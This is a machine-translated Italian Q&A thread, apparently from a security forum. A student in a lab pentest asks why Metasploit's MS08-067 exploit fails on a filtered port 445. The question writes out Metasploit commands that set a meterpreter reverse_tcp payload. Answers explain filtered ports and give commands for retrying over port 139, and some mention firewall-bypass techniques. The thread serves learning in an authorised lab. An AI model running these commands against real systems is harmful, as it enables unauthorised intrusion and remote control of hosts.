Sfruttare attraverso una porta filtrata

5

Sto facendo un pentecoste contro una macchina che il docente ha allestito in laboratorio. NMAP mostra la porta 445 da filtrare e Nessus conferma che la vulnerabilità ms08_067 è presente su quella macchina.

Ho provato a eseguire Metasploit contro di esso nel modo normale:

use exlpoit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit

Mi dice:

[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.2.2:445)

Suppongo che l'exploit stia fallendo perché la porta 445 viene filtrata. La cosa che mi ha confuso è che Nessus può apparentemente controllare che la vulnerabilità sia presente. Poiché Nessus può farlo attraverso la porta filtrata, c'è un modo in cui posso lanciare l'exploit attraverso una porta filtrata? Ci sono impostazioni Metasploit che devono essere organizzate?

    
posta Juicy 10.03.2014 - 21:05
fonte

5 risposte

9

Hai informazioni contraddittorie: nmap dice che la porta è filtrata ma nessus dice che la vulnerabilità è presente sul sistema. Non possono essere entrambi veri, uno di questi deve essere sbagliato. Dato che metasploit non è in grado di connettersi, è probabile che nessus stia riportando in modo errato o sta basando il rapporto sulle vulnerabilità sulle informazioni raccolte da altre porte aperte. Se guardi pagina del tenable su questo advisor vedrai che nessus può testarlo usando la porta 139 o la porta 445, quindi 139 è probabilmente aperto e può essere sfruttabile.

    
risposta data 10.03.2014 - 21:43
fonte
3

tl; dr No, non sarai in grado di sfruttare direttamente questa vulnerabilità attraverso una porta filtrata e non può essere rilevata in questo modo. Ci deve essere qualcos'altro in corso nel tuo scenario.

Perché?

Se questa porta ritorna come filtrata, un firewall o IPS sta perdendo pacchetti, il che significa che non riceverai alcuna risposta dal server. Questo difetto (MS08-067) può essere rilevato solo da Nessus se lo scanner di vulnerabilità può stabilire una connessione SMB a questa porta. Nessus non tenterà in alcun modo di aggirare il firewall in alcun modo, ma potrebbe fare un diverso tipo di port scan che potrebbe avere risultati diversi.

Possibili ragioni per i risultati che stai vedendo:

  • Nessus potrebbe rilevare la vulnerabilità su una porta diversa, probabilmente NetBIOS su TCP (NBT) su TCP / 139. Controlla attentamente la relazione Nessus. In questo caso avresti bisogno di set RPORT 139 e anche set SMBDirect false . Quest'ultimo è un'opzione avanzata ( show advanced ).

  • Esiste un tipo di prevenzione delle intrusioni tra te e l'host di destinazione (o l'host di destinazione) che sta portando a risultati di scansione delle porte incoerenti. Prova a eseguire NMAP in varie configurazioni ( -sS , -sT , -p445,139 ecc.) Per vedere se i risultati sono coerenti. Questo in realtà non spiega perché Nessus sarebbe in grado di rilevarlo, ma non sarebbe comunque sfruttato da Metasploit. Sembra anche improbabile in un ambiente di laboratorio, a meno che il laboratorio non sia stato specificamente configurato per l'evasione di IPS.

risposta data 10.03.2014 - 22:58
fonte
2

"Filtrato" di solito significa che non è stata ricevuta alcuna risposta dalla porta (al contrario di chiusa, che risponde con il pacchetto RST - vedi Port Scanner su wikipedia ). Questo di solito indica che il firewall sta semplicemente eliminando i pacchetti che vanno a quella porta ed è improbabile che sia sfruttabile.

    
risposta data 10.03.2014 - 21:31
fonte
2

Anche se la porta 445 (SMB) è chiusa, a volte è possibile sfruttare questa vulnerabilità tramite la porta 139 (NetBios). In metasploit, basta usare la seguente sintassi:

set RPORT 139; set SMBDirect false; exploit
    
risposta data 09.01.2017 - 15:27
fonte
1

Potresti essere in grado di utilizzare la tecnica BNAT-Suite (inclusa anche in Metasploit) o la tecnica firewallbypass Nmap NSE per dare un pugno attraverso il firewall o il meccanismo di filtraggio IP.

    
risposta data 09.01.2015 - 15:59
fonte

Leggi altre domande sui tag